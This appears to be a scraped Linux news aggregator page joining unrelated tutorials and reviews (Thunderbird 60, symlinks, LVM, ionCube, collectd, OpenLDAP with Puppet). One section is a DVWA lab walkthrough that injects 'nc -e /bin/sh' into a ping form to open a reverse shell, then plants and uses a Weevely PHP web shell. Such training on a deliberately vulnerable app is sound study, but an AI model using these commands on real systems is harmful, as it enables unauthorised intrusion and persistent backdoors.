FOSSPicks » Linux Magazine

Graham reviews Thunderbird 60, Stress-Terminal UI, Taskbook, SolveSpace, Star Ruler 2, and more!

Email client

Thunderbird 60

As much as online proprietary services would like old-school email to go away, it’s not dead yet. The great thing about email is that it’s truly peer-to-peer and open. It enables any of us to run our own mail domain and send and receive messages from our own servers or computers, which causes the major problem with email too – anyone includes spammers, and there are thousands of them. There are solutions to spammers (SpamAssassin and Rspamd), and email is still amazingly useful. In the end, we still need a desktop email client. Roundcube and other online services are great, but they can’t compete with the desktop integration and offline access of a proper application like Mozilla’s Thunderbird.

Thunderbird used to be the go-to desktop email application, regardless of your operating system and desktop environment. Its development stalled. Fortunately, there was enough community concern for Thunderbird and its pivotal role as one of the only usable open source email clients that development has restarted. This is the first major Thunderbird release under this new regime, and one hopes the first of many as Mozilla rewrites the codebase, drops the old Firefox technologies, and builds an email client fit for the future. This doesn’t mean that this release doesn’t include lots of updates – it does. After a long period of stable release stasis, version 60 really does contain many new features and fixes. For that reason, it doesn’t automatically upgrade from old versions. Keeping with the times, there are now light and dark themes thanks to the use of Firefox’s Photon design and excellent FIDO U2F support for two-factor authentication with various devices. There’s also experimental support for the conversion between MBOX and Maildir mail storage formats, which is particularly useful for Linux users who have historically started with one and now want to switch to the other.

When composing messages, there are several improvements to the way attachments are handled, allowing you to reorder them. The attachment pane appears when you first start writing an email, along with a hidden but non-empty attachment pane showing a paperclip. You can also remove recipients by clicking on a delete button that’s displayed when you move your cursor over the To/Cc/Bcc selector, and you can save a message as a template for other messages, creating them with the New Message from Template command. Native Linux notifications have been also reinstated. Besides these changes, there are lots of fixes that aren’t obvious. The calendar now allows for copying, cutting, and deleting across a single or recurring event, and it’s now much easier to see event locations in the week and day calendar views. Thunderbird is starting to feel alive again. While there are still some major features we’d like to see, such as integrated and simplified OpenPGP to strengthen Thunderbird’s privacy credentials, we’re just pleased the project is being worked on at all. Here’s to the next release!

[…]

Use Express-Checkout link below to read the full article (PDF).

Source

Understanding Linux Links: – Linux.com

Along with cp and mv, both of which we talked about at length in the previous installment of this series, links are another way of putting files and directories where you want them to be. The advantage is that links let you have one file or directory show up in several places at the same time.

As noted previously, at the physical disk level, things like files and directories don’t really exist. A filesystem conjures them up for our human convenience. But at the disk level, there is something called a partition table, which lives at the beginning of every partition, and then the data scattered over the rest of the disk.

Although there are different types of partition tables, the ones at the beginning of a partition containing your data will map where each directory and file starts and ends. The partition table acts like an index: When you load a file from your disk, your operating system looks up the entry on the table and the table says where the file starts on the disk and where it finishes. The disk header moves to the start point, reads the data until it reaches the end point and, hey presto: here’s your file.

Hard Links

A hard link is simply an entry in the partition table that points to an area on a disk that has already been assigned to a file. In other words, a hard link points to data that has already been indexed by another entry. Let’s see how this works.

Open a terminal, create a directory for tests and move into it:

mkdir test_dir
cd test_dir

Create a file by touching it:

touch test.txt

For extra excitement (?), open test.txt in a text editor and add some a few words into it.

Now make a hard link by executing:

ln test.txt hardlink_test.txt

Run ls, and you’ll see your directory now contains two files… Or so it would seem. As you read before, really what you are seeing is two names for the exact same file: hardlink_test.txt contains the same content, has not filled any more space in the disk (try with a large file to test this), and shares the same inode as test.txt:

$ ls -li *test*
16515846 -rw-r–r– 2 paul paul 14 oct 12 09:50 hardlink_test.txt
16515846 -rw-r–r– 2 paul paul 14 oct 12 09:50 test.txt

ls‘s -i option shows the inode number of a file. The inode is the chunk of information in the partition table that contains the location of the file or directory on the disk, the last time it was modified, and other data. If two files share the same inode, they are, to all practical effects, the same file, regardless of where they are located in the directory tree.

Fluffy Links

Soft links, also known as symlinks, are different: a soft link is really an independent file, it has its own inode and its own little slot on the disk. But it only contains a snippet of data that points the operating system to another file or directory.

You can create a soft link using ln with the -s option:

ln -s test.txt softlink_test.txt

This will create the soft link softlink_test.txt to test.txt in the current directory.

By running ls -li again, you can see the difference between the two different kinds of links:

$ ls -li
total 8
16515846 -rw-r–r– 2 paul paul 14 oct 12 09:50 hardlink_test.txt
16515855 lrwxrwxrwx 1 paul paul 8 oct 12 09:50 softlink_test.txt -> test.txt
16515846 -rw-r–r– 2 paul paul 14 oct 12 09:50 test.txt

hardlink_test.txt and test.txt contain some text and take up the same space *literally*. They also share the same inode number. Meanwhile, softlink_test.txt occupies much less and has a different inode number, marking it as a different file altogether. Using the ls‘s -l option also shows the file or directory your soft link points to.

Why Use Links?

They are good for applications that come with their own environment. It often happens that your Linux distro does not come with the latest version of an application you need. Take the case of the fabulous Blender 3D design software. Blender allows you to create 3D still images as well as animated films and who wouldn’t to have that on their machine? The problem is that the current version of Blender is always at least one version ahead of that found in any distribution.

Fortunately, Blender provides downloads that run out of the box. These packages come, apart from with the program itself, a complex framework of libraries and dependencies that Blender needs to work. All these bits and piece come within their own hierarchy of directories.

Every time you want to run Blender, you could cd into the folder you downloaded it to and run:

./blender

But that is inconvenient. It would be better if you could run the blender command from anywhere in your file system, as well as from your desktop command launchers.

The way to do that is to link the blender executable into a bin/ directory. On many systems, you can make the blender command available from anywhere in the file system by linking to it like this:

ln -s /path/to/blender_directory/blender /home/<username>/bin

Another case in which you will need links is for software that needs outdated libraries. If you list your /usr/lib directory with ls -l, you will see a lot of soft-linked files fly by. Take a closer look, and you will see that the links usually have similar names to the original files they are linking to. You may see libblah linking to libblah.so.2, and then, you may even notice that libblah.so.2 links in turn to libblah.so.2.1.0, the original file.

This is because applications often require older versions of alibrary than what is installed. The problem is that, even if the more modern versions are still compatible with the older versions (and usually they are), the program will bork if it doesn’t find the version it is looking for. To solve this problem distributions often create links so that the picky application believes it has found the older version, when, in reality, it has only found a link and ends up using the more up to date version of the library.

Somewhat related is what happens with programs you compile yourself from the source code. Programs you compile yourself often end up installed under /usr/local: the program itself ends up in /usr/local/bin and it looks for the libraries it needs / in the /usr/local/lib directory. But say that your new program needs libblah, but libblah lives in /usr/lib and that’s where all your other programs look for it. You can link it to /usr/local/lib by doing:

ln -s /usr/lib/libblah /usr/local/lib

Or, if you prefer, by cding into /usr/local/lib

cd /usr/local/lib

… and then linking with:

ln -s ../lib/libblah

There are dozens more cases in which linking proves useful, and you will undoubtedly discover them as you become more proficient in using Linux, but these are the most common. Next time, we’ll look at some linking quirks you need to be aware of.

Learn more about Linux through the free “Introduction to Linux” course from The Linux Foundation and edX.

Source

Linux Today – KDE Plasma 5.14 Desktop Environment Gets First Point Release, Update Now

Oct 17, 2018, 14:00

(Other stories by Marius Nestor)

Released last week on October 9, 2018, the KDE Plasma 5.14 desktop environment improvements to Plasma Discover package manager, a new Firmware Update feature, various user interface enhancements, better and new desktop effects, as well as slicker animations in the KWin window manager.

Now, the first point release, KDE Plasma 5.14.1, is available with an extra layer of improvements. Among the highlights of the KDE Plasma 5.14.1 point release, we can mention keyboard support for navigating desktop icons and the KonsoleProfiles applet, as well as focus handling fixes, addressed visual artifacts caused by the maximize KWin effect, better Flatpak and Snap support in Plasma Discover, and firmware update (fwupd) improvements.

Complete Story

Source

Linux Logical Volume Manager Video Tutorial look at source.

In this series of video tutorials, you will learn what LVM is and when you should use it. You’ll discover how LVM creates and uses layers of abstraction between storage devices and file systems including Physical Volumes, Volume Groups, and Logical Volumes.

More importantly, you’ll learn how to configure LVM, starting with the pvcreate command to configure physical volumes, the vgcreate command to configure volume groups, and the lvcreate command to create logical volumes.

Plus, you’ll see how easy it is to extend file systems and logical volumes using the lvextend command. Likewise, adding more space to the storage pool is painless with the vgextend command.

Next, you’ll learn how to create mirrored logical volumes and even how to migrate data from one storage device to another, without taking any downtime.

Introduction to the Logical Volume Manager (LVM)

Layers of Abstraction in LVM

Creating Physical Volumes (PVs), Volume Groups (VGs), and Logical Volumes (LVs)

Extending Volume Groups and Logical Volumes

Mirroring Logical Volumes

Removing Logical Volumes, Physical Volumes, and Volume Groups

Migrating Data from One Storage Device to Another

Logical Volume Manager – Summary

More Linux System Administration Resources

LVM Companion Workbook

Source

Linux Scoop — Linux Lite 4.0

Linux Lite 4.0 – See What’s New

Linux Lite 4.0 codename “Diamond” is the latest release of Linux Lite, Based on Ubuntu 18.04 and powered by Linux Kernel 4.15 series. Also, comes with a brand new icon and system theme, namely Papirus and Adapta. Timeshift app by default for system backups, and new, in-house built Lite applications.

Among the new Lite applications, we can mention the Lite Desktop, which manages application icons and other objects on the desktop, and Lite Sounds, a tool designed to help users manage system-wide sounds. Also, Linux Lite 4.0 ships with the MenuLibre tool to help you easily edit application menu entries and Shotwell for basic image management.

Linux Lite 4.0 Release Notes

Source

how to check physical network cable connection status on linux ?

Method 1

Using dmesg

Using dmesg is one of the 1st things to do for inquiring current state of system:

Example:

dmesg | sed ‘/eth.*Link is/h;$;d’

[1667676.292871] e1000e: eth0 NIC Link is Up 100 Mbps Full Duplex, Flow Control: Rx/Tx

Method 2

/sys/class/net/

cat /sys/class/net/eth0/carrier

1

The number 1 in the above output means that the network cable is connection physically
to your’s network card slot.

Or

cat /sys/class/net/eth0/operstate

up

Method 3

Using ethtool command

Syantax : ethtool interface_name | grep Link d

Example:

ethtool eth0 | grep Link d

Link detected: yes

we can use bash for loop again to check all network interfaces it once:

for i in $( ls /sys/class/net ); do echo -n $i; ethtool $i | grep Link d; done

Sample output:

eth0 Link detected: yes
eth1 Link detected: no
lo Link detected: yes
wlan0 Link detected: no

NOTE:

The only problem with the above ethtool output is that it will not detect connected

cable if your network interface is down. Consider a following example:

# ethtool eth0 | grep Link d
Link detected: yes
# ifconfig eth0 down
# ethtool eth0 | grep Link d
Link detected: no
# ifconfig eth0 up
# ethtool eth0 | grep Link d
Link detected: yes

Source

Create a Back Door on DVWA with Kali, Netcat and Weevely – LSB – ls /blog

Welcome back my budding hackers. We hope you enjoy this security tutorial by our ethical hacker QuBits. Our network is below.

network

We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.

wee1

To start with, change the security settings from high to low on DVWA Security Tab above.

wee2

Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.

wee3

We will enter an IP address and click on submit.

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!

wee4

Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:

nc -vv -l -p 8888 (8888 is the port we want to listen on)

wee5

Next, in DVWA, type any IP then ; then nc -e /bin/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.

wee6

Connection established, we have full control of the web app.

wee7

$299 WILL ENROLL YOU IN OUR SELF PACED COURSE – LFS205 – ADMINISTERING LINUX ON AZURE!

Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.

First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:

weevely generate 123456 /root/shell.txt. 123456 will be our password which we will use later.

wee8

Copy it to:

cp /root/shell.txt /var/www/html so we can see it in our browser.

wee9

Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.

wee10

Next we start the server on the Kali machine. Start the server:

service apache2 start

wee11

On Kali browser go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm file is there.

wee12

We still have a netcat connection on the server so we can wget our shell.txt file:

wget http://192.168.56.103/shell.txt and the shell.txt should show uploaded

wee13

The file has been uploaded, next we need to change it to php extension for it to run.

Mv shell.txt shell.php

wee18

Connect to the upload in Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456

wee20

We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.

:help this will give you a list of commands you can run on your back door. Interesting ones are:

:system_info

wee21

cat /etc/passwd

wee22

Another interesting command we can use is :audit_etcpasswd -vector <option>

To upload a file to the target system:

:file_download rpath is remote path and lpath for local.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13

BUNDLE CLOUD FOUNDRY FOR DEVELOPERS COURSE(LFD232) AND THE CFCD CERTIFICATION FOR $499!

Source

How to Install ionCube Loader on Ubuntu 16.04 – LinuxCloudVPS Blog

In this article, we will perform an installation of ionCube on an Ubuntu 16.04 server. First, we will explain what is “ionCube”, and then we will proceed with the step-by-step instructions for installing and how to check it is installed on the Ubuntu 16.04. ionCube is an extension of a PHP module that is used to speed up web pages and load encrypted PHP files. In other words, ionCube is an encoder tool used to ensure that your PHP applications are not redistributed illegally and are not being modified or read by anyone.

In order to follow this tutorial you will need:

  • Ubuntu 16.04 server
  • A web server like Apache or Nginx with PHP installed

Find and choose the right ionCube version

The first thing you need to know is that the version of the ionCube must match your already installed PHP version. So, to continue we need to have some information about which version of PHP is using our web server.

To retrieve information about the current PHP configuration on your server we are going to use a small script. We will create a file named info.php in the root web server directory (by default is /var/www/html unless you’ve changed it) using your favorite text editor or simply use nano as shown in our example.

$ sudo nano /var/www/html/info.php

Add the code shown below and nothing more.

<?php
phpinfo();

Save the changes and close the file.

Now open your favorite browser and visit http://server_ip_address/info.php

The visited page should look like this:

Install ionCube Loader on Ubuntu 16.04

 

From the page header, we can see which PHP version of our web server uses. In this example, we use PHP Version 7.0.30 and from the Server API line, we can see that we are using Apache 2.0.

Once we have this information on our server, we can proceed with the next step that is downloading and installing.

2. Installation and Setting Up ionCube

We will visit now the official ionCube download page and copy the link location from the version of your OS. In our example, we will use the zip for Linux 64-bit version. You can download on your server with this command:

$ wget https://downloads.ioncube.com/loader_downloads/ioncube_loaders_lin_x86-64.zip

extract the archive with this command:

$ unzip ioncube_loaders_lin_x86-64.zip

When we extract the zip file we just downloaded, it will create a directory that will contain multiple files for different versions of PHP. From the unpacked directory we will search for the version of PHP that we currently use on our server, and in this example will be the version of PHP 7.0. So, we will copy the file ioncube_loader_lin_7.0.so into the PHP extensions directory with the following command:

$ sudo cp ioncube/ioncube_loader_lin_7.0.so /usr/lib/php/20151012/

You can always check the location of the PHP extensions directory at http://server_ip_address/info.php and find the extension_dir as shown below.

Installing ionCube Loader on Ubuntu 16.04

The next step is to add the extension to the PHP configuration so that it can load the ionCube extension. There are two ways to do this:

  • First, is to modify the main php.ini configuration (which is not recommended).
  • Second is to create a separate file and set it to load before the other extensions to evade some possible conflicts.

In this example, we will use the second option and we will create a separate file. Once again we need a location so we can create our own configuration file. To find the location, we return to http://server_ip_address/info.php and search Scan this dir for additional .ini files.

Installing ionCube Loader Ubuntu 16.04

With the following command, we will create a file in the /etc/php/7.0/apache2/conf.d directory named 00-ioncube.ini

$ sudo nano /etc/php/7.0/apache2/conf.d/00-ioncube.ini

In order for this file to be loaded in front of all other PHP configuration files, we use 00 at the beginning of the name of this file.

Add the loading directive and then save the file.

zend_extension = “/usr/lib/php/20151012/ioncube_loader_lin_7.0.so”

Once we restart the web server, the above changes will take effect.

For Nginx web server run:

$ sudo systemctl restart nginx

For Apache web server run:

$ sudo systemctl restart apache2.service

And if you use a php-fpm service, it’s better to restart as well.

$ sudo systemctl restart php7.0-fpm.service

Now let’s check if the ionCube is installed and enabled.

3. Confirm the ionCube installation

In this last step, we will confirm that our ionCube has been successfully installed and enabled. We will go back to our browser and refresh our website http://server_ip_address/info.php. If PHP Loader is enabled, it should look like this:

How to Install ionCube Loader Ubuntu 16.04

With this, we are sure that the extension of the PHP ionCube is properly installed and enabled.

Now the last thing we need to do is remove the info.php script. Our recommendation is not to keep this script because it shows a lot of server information that can be used by potential attackers.

$ sudo rm /var/www/html/info.php

Also, we will remove the downloaded ionCube file because we used them and now there are not necessary to take space in our server.

$ sudo rm ioncube_loaders_lin_x86-64.tar.gz

$ sudo rm -rf ioncube_loaders_lin_x86-64

Congratulations, we have fully established and functional ionCube expansion. With this, we secure our environment for all our PHP applications.

Of course, you don’t have to know how to install ionCube Loader on Ubuntu 16.04 if you have a VPS Hosting with us. You can simply ask our administrators to install ionCube Loader on Ubuntu 16.04 for you. They’re available 24/7, and will be able to help you with the installation of ionCube Loader on Ubuntu 16.04.

PS. If you enjoy reading this blog post on How to Install ionCube Loader on Ubuntu 16.04, feel free to share it on social networks using the shortcuts below, or simply leave a comment.

Be the first to write a comment.

Source

CollectD System Performance Monitor Installation On Centos 7

Collectd is a daemon which collects system performance data and metrics. It runs as a daemon and the data it collects can either be processed locally or sent to a central logging server. It is easy to configure and set up and can be configured to report to various metric analytics platforms. This is is a guide to install the daemon on Centos 7. You can read more about the project here. The platform is robust and offers hundreds of plugins for monitoring various services. Once you have installed it, you can use the metrics to determine bottlenecks in system performance and potential opportunities to improve.

Install CollectD

Make sure everything is up to date:

yum update
yum upgrade

The required packages are contained the EPEL repository so you will need to install that:

yum install epel-release

The install the service itself:

yum install collectd

Configure CollectD

Once it has been installed you can edit the configuration to match what you need to monitor. The configuration is located at /etc/collectd.conf there are numerous plugins you can enable to monitor different aspects of the server or services. In this particular guide we are just going to leave the base install. We are just going to update the hostname:

nano /etc/collectd.conf

Un-comment this line and configure it to match your servers hostname

#Hostname “localhost”

If this hostname does not actually resolve you will want to uncomment

#FQDNLookup true

And set it to false

FQDNLookup false

You will need to enable the service on CentOS 7:

systemctl enable collectd

Then you can go ahead and start the logging daemon:

systemctl start collectd

You can verify its running by checking its status

# systemctl status collectd
● collectd.service – Collectd statistics daemon
Loaded: loaded (/usr/lib/systemd/system/collectd.service; disabled; vendor preset: disabled)
Active: active (running) since Wed 2017-09-06 22:05:51 EDT; 4 days ago
Docs: man:collectd(1)
man:collectd.conf(5)
Main PID: 8497 (collectd)
CGroup: /system.slice/collectd.service
└─8497 /usr/sbin/collectd

You are looking for a ‘Active: active (running)’ running status. That’s it for installing the service itself, we will be releasing more guides on how to configure various platforms for it to report to.

Sep 11, 2017LinuxAdmin.io

Source

Configure OpenLDAP Master/Slave Replication with Puppet | Lisenet.com :: Linux | Security

We’re going to use Puppet to configure a pair of OpenLDAP servers with a master-slave replication.

This article is part of the Homelab Project with KVM, Katello and Puppet series.

Homelab

We have two CentOS 7 servers installed which we want to configure as follows:

ldap1.hl.local (10.11.1.11) – will be configured as an LDAP master
ldap2.hl.local (10.11.1.12) – will be configured as an LDAP slave

Both servers have SELinux set to enforcing mode.

See the image below to identify the homelab part this article applies to.

Configuration with Puppet

Puppet master runs on the Katello server. We use camptocamp-openldap Puppet module to configure OpenLDAP. Please see the module documentation for features supported and configuration options available.

See here (CentOS 7) and here (Debian) for blog posts on how to configure an OpenLDAP server manually.

Note that instructions below apply to both LDAP servers.

Firewall configuration to allow LDAPS access from homelab LAN:

firewall { ‘007 allow LDAPS’:
dport => [636],
source => ‘10.11.1.0/24’,
proto => tcp,
action => accept,
}

Ensure that the private key (which we created previously) in the PKCS#8 format is available.

file {‘/etc/pki/tls/private/hl.pem’:
ensure => file,
source => ‘puppet:///homelab_files/hl.pem’,
owner => ‘0’,
group => ‘ldap’,
mode => ‘0640’,
}

Configure the LDAP server (note how we bind to the SSL port):

class { ‘openldap::server’:
ldap_ifs => [‘127.0.0.1:389/’],
ldaps_ifs => [‘0.0.0.0:636/’],
ssl_cert => ‘/etc/pki/tls/certs/hl.crt’,
ssl_key => ‘/etc/pki/tls/private/hl.pem’,
}

Configure the database:

openldap::server::database { ‘dc=top’:
ensure => present,
directory => ‘/var/lib/ldap’,
suffix => ‘dc=top’,
rootdn => ‘cn=admin,dc=top’,
rootpw => ‘cGfSAyREZC5XnJa77iP+EdR8BrvZfUuo’,
}

Configure schemas:

openldap::server::schema { ‘cosine’:
ensure => present,
path => ‘/etc/openldap/schema/cosine.schema’,
}
openldap::server::schema { ‘inetorgperson’:
ensure => present,
path => ‘/etc/openldap/schema/inetorgperson.schema’,
require => Openldap::Server::Schema[“cosine”],
}
openldap::server::schema { ‘nis’:
ensure => present,
path => ‘/etc/openldap/schema/nis.ldif’,
require => Openldap::Server::Schema[“inetorgperson”],
}

Configure ACLs:

$homelab_acl = {
‘0 to attrs=userPassword,shadowLastChange’ => [
‘by dn=”cn=admin,dc=top” write’,
‘by dn=”cn=reader,dc=top” read’,
‘by self write’,
‘by anonymous auth’,
‘by * none’,
],
‘1 to dn.base=””‘ => [
‘by * read’,
],
‘2 to *’ => [
‘by dn=”cn=admin,dc=top” write’,
‘by dn=”cn=reader,dc=top” read’,
‘by self write’,
‘by users read’,
‘by anonymous auth’,
‘by * none’,
],
}
openldap::server::access_wrapper { ‘dc=top’ :
acl => $homelab_acl,
}

Base configuration:

file { ‘/root/.ldap_config.ldif’:
ensure => file,
source => ‘puppet:///homelab_files/ldap_config.ldif’,
owner => ‘0’,
group => ‘0’,
mode => ‘0600’,
notify => Exec[‘configure_ldap’],
}
exec { ‘configure_ldap’:
command => ‘ldapadd -c -x -D cn=admin,dc=top -w PleaseChangeMe -f /root/.ldap_config.ldif && touch /root/.ldap_config.done’,
path => ‘/usr/bin:/usr/sbin:/bin:/sbin’,
provider => shell,
onlyif => [‘test -f /root/.ldap_config.ldif’],
unless => [‘test -f /root/.ldap_config.done’],
}

Content of the file ldap_config.ldif can be seen below.

We create a read-only account cn=reader,dc=top for LDAP replication, we also create an LDAP user uid=tomas,ou=Users,dc=hl.local,dc=top to log into homelab servers.

dn: cn=reader,dc=top
objectClass: simpleSecurityObject
objectclass: organizationalRole
description: LDAP Read-only Access
userPassword: NrBn6Kd4rW8jmf+KWmfbTMFOkcC43ctF

dn: dc=hl.local,dc=top
o: hl.local
dc: hl.local
objectClass: dcObject
objectClass: organization

dn: ou=Users,dc=hl.local,dc=top
objectClass: organizationalUnit
ou: Users

dn: uid=tomas,ou=Users,dc=hl.local,dc=top
uid: tomas
uidNumber: 5001
gidNumber: 5001
objectClass: top
objectClass: person
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
userPassword: aBLnLxAUZAqwwII6fNUzizyOY/YAowtt
cn: Tomas
gn: Tomas
sn: Admin
mail: [email protected]
shadowLastChange: 16890
shadowMin: 0
shadowMax: 99999
shadowWarning: 14
shadowInactive: 3
loginShell: /bin/bash
homeDirectory: /home/guests/tomas

dn: ou=Groups,dc=hl.local,dc=top
objectClass: organizationalUnit
ou: Groups

dn: cn=tomas,ou=Groups,dc=hl.local,dc=top
gidNumber: 5001
objectClass: top
objectClass: posixGroup
cn: tomas

LDAP Master Server

Configure sync provider on the master node:

file { ‘/root/.ldap_syncprov.ldif’:
ensure => file,
source => ‘puppet:///homelab_files/ldap_syncprov.ldif’,
owner => ‘0’,
group => ‘0’,
mode => ‘0600’,
notify => Exec[‘configure_syncprov’],
}
exec { ‘configure_syncprov’:
command => ‘ldapadd -c -Y EXTERNAL -H ldapi:/// -f /root/.ldap_syncprov.ldif && touch /root/.ldap_syncprov.done && systemctl restart slapd’,
path => ‘/usr/bin:/usr/sbin:/bin:/sbin’,
provider => shell,
onlyif => [
‘test -f /root/.ldap_syncprov.ldif’,
‘test -f /root/.ldap_config.done’
],
unless => [‘test -f /root/.ldap_syncprov.done’],
}

Content of the file ldap_syncprov.ldif for the master server can be seen below.

dn: cn=module,cn=config
objectClass: olcModuleList
cn: module
olcModulePath: /usr/lib64/openldap
olcModuleLoad: syncprov.la

dn: olcOverlay=syncprov,olcDatabase=hdb,cn=config
objectClass: olcOverlayConfig
objectClass: olcSyncProvConfig
olcOverlay: syncprov
olcSpSessionLog: 100

LDAP Slave Server

Configure replication on the slave node:

file { ‘/root/.ldap_replication.ldif’:
ensure => file,
source => ‘puppet:///homelab_files/ldap_replication.ldif’,
owner => ‘0’,
group => ‘0’,
mode => ‘0600’,
notify => Exec[‘configure_replication’],
}
exec { ‘configure_replication’:
command => ‘ldapadd -c -Y EXTERNAL -H ldapi:/// -f /root/.ldap_replication.ldif && touch /root/.ldap_replication.done && systemctl restart slapd’,
path => ‘/usr/bin:/usr/sbin:/bin:/sbin’,
provider => shell,
onlyif => [‘test -f /root/.ldap_config.done’],
unless => [‘test -f /root/.ldap_replication.done’],
}

Content of the file ldap_replication.ldif for the slave server is below. Note how we bind to the SSL port.

dn: olcDatabase=hdb,cn=config
changetype: modify
add: olcSyncRepl
olcSyncRepl: rid=001
provider=ldaps://ldap1.hl.local:636/
searchbase=”dc=hl.local,dc=top”
type=refreshAndPersist
retry=”60 10 300 +”
schemachecking=on
bindmethod=simple
binddn=”cn=reader,dc=top”
credentials=PleaseChangeMe
tls_reqcert=never
tls_cert=/etc/pki/tls/certs/hl.crt
tls_cacert=/etc/pki/tls/certs/hl.crt
tls_key=/etc/pki/tls/private/hl.pem

The Result

We should end up with the following LDAP structure:


Anything that gets created on the LDAP master should be automatically synced to the slave.

Debugging LDAP Issues

If you hit problems, try running the following to start the LDAP server in debug mode with logging to the console:

# slapd -h ldapi:/// -u ldap -d 255

The logs can be a difficult to parse, but with Google search and a bit of luck you should to be able to work out what is going on.

Configure All Homelab Servers to use LDAP Authentication

We use Puppet module sgnl05-sssd to configure SSSD.

Add the following to the main homelab environment manifest file /etc/puppetlabs/code/environments/homelab/manifests/site.pp so that it gets applied to all servers.

Note how SSSD is configured to use both LDAP servers for redundancy.

class {‘::sssd’:
ensure => ‘present’,
config => {
‘sssd’ => {
‘domains’ => ‘default’,
‘config_file_version’ => 2,
‘services’ => [‘nss’, ‘pam’],
},
‘domain/default’ => {
‘id_provider’ => ‘ldap’,
‘auth_provider’ => ‘ldap’,
‘cache_credentials’ => true,
‘default_shell’ => ‘/bin/bash’,
‘mkhomedir’ => true,
‘ldap_search_base’ => ‘dc=hl.local,dc=top’,
‘ldap_uri’ => ‘ldaps://ldap1.hl.local,ldaps://ldap2.hl.local’,
‘ldap_id_use_start_tls’ => false,
‘ldap_tls_reqcert’ => ‘never’,
‘ldap_default_bind_dn’ => ‘cn=reader,dc=top’,
‘ldap_default_authtok’ => ‘PleaseChangeMe’,
}
}
}

After Puppet applies the configuration above, we should be able to log into all homelab servers with the LDAP user.

Source

WP2Social Auto Publish Powered By : XYZScripts.com